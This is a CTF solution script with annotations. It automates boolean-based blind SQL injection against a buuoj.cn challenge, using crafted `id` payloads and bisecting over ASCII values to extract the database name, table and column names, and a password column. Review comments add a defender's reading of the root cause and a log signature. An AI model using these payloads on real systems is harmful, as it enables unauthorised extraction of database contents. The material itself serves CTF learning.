Clever! But not this table.
"""Boolean-based blind SQL injection walkthrough for the CTF challenge above.

Every query sends a crafted ``id`` parameter of the form ``1^1^(<condition>)``
and treats the substring ``"Click"`` in the HTTP response as the oracle for
"condition is true" (presumably the page renders a "Click ..." hint only for a
truthy row lookup — verify against the target page). Characters are recovered
one at a time with a binary search over their ASCII value.

Defender's reading: the root cause is the ``id`` value being concatenated
into the SQL text unparameterised; the traffic pattern — a burst of requests
to the same endpoint that differ only in the two integers inside
``ascii(substr(...,%d,1))>=%d`` — is a straightforward log signature.
"""
import requests
import sys  # NOTE(review): imported but never used below
import time


def get_DBlen(url):
    """Return the length of ``database()``, probing 1..9 with an equality check.

    Args:
        url: target URL up to and including ``?id=``; the payload is appended.

    Returns:
        The first ``i`` in 1..9 for which the oracle fires, or ``None`` if the
        length is outside that range (the caller does not handle ``None``).
    """
    for i in range(1,10):
        db_url = url+"1^1^(length(database())=%d)#"%i
        r = requests.get(db_url)
        if "Click" in r.text:
            print("数据库名称的长度为:%d"%i)  # "length of the database name is: %d"
            return i


def get_DBname(url,length):
    """Recover ``database()`` character by character.

    Args:
        url: target URL up to and including ``?id=``.
        length: number of characters to extract (from ``get_DBlen``).

    Returns:
        The recovered name as a string.

    For each position the ASCII range 41..122 is bisected with a ``>=`` probe;
    when ``Min`` overtakes ``Max`` the last recomputed ``Mid`` equals ``Max``,
    i.e. the largest value the oracle confirmed, which is the character code.
    """
    DBname = ""
    length = length + 1
    for i in range(1,length):
        Max = 122
        Min = 41
        Mid = (Max+Min)//2
        while Min <= Max:
            # Probe: is the i-th character of database() >= Mid?
            # (original label "爆表名" — "dump table name" — but this
            # payload actually reads database(), not a table name)
            db_url = url+"1^1^(ascii(substr(database(),%d,1))>=%d)#"%(i,Mid)
            r = requests.get(db_url)
            if "Click" in r.text:
                # condition true -> character is at or above Mid
                Min=Mid+1
                Mid=(Min+Max)//2
                pass
            else:
                # condition false -> character is below Mid
                Max = Mid-1
                Mid = (Min+Max)//2
                pass
            pass
        DBname = DBname + chr(Mid)
        print(DBname)  # progress: prints the partial name after each character
    return DBname


def get_TBname(url):
    """Extract the contents of the ``password`` column one character at a time.

    Args:
        url: target URL up to and including ``?id=``.

    Returns:
        ``None`` — the recovered string is only printed, never returned, so the
        ``tb_name`` variable assigned in ``__main__`` is always ``None``.

    Despite its name, the active payload reads ``group_concat(password)`` from
    the table found earlier; the two commented-out payloads are the previous
    stages the author used to enumerate the table name and the column names.
    The outer loop has no fixed length: it stops when the bisection bottoms
    out at 31, which happens once ``substr`` runs past the end of the string
    (``ascii('')`` is 0, so every ``>=`` probe in 32..128 is false).
    """
    name=""
    i = 0
    while True:
        i = i+1
        Max = 128
        Min = 32
        Mid = (Max+Min)//2
        while Min <= Max:
            # Stage 1 (commented out): enumerate table names  — "爆表名"
            # db_url = url+"1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>=%d)#"%(i,Mid)
            # Stage 2 (commented out): enumerate column names — "爆字段名"
            # db_url = url+"1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>=%d)#"%(i,Mid)
            # Stage 3 (active): read the flag — "获取flag"
            db_url = url+"1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>=%d)"%(i,Mid)
            r = requests.get(db_url)
            if "Click" in r.text:
                Min=Mid+1
                Mid=(Min+Max)//2
                pass
            else:
                Max=Mid-1
                Mid=(Min+Max)//2
                pass
            pass
        name=name+chr(Mid)
        print(name)  # progress: partial value so far (includes chr(31) on the final round)
        if Mid == 31:
            # bisection floor reached -> no character at position i, string is complete
            break
        time.sleep(0.5)  # throttle between characters


if __name__=="__main__":
    # Challenge instance URL from the writeup; the ``id`` value is appended by each helper.
    url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id="
    db_Len = get_DBlen(url)
    db_Name = get_DBname(url,db_Len)
    tb_name = get_TBname(url)  # always None, see get_TBname
转载地址:http://rywmf.baihongyu.com/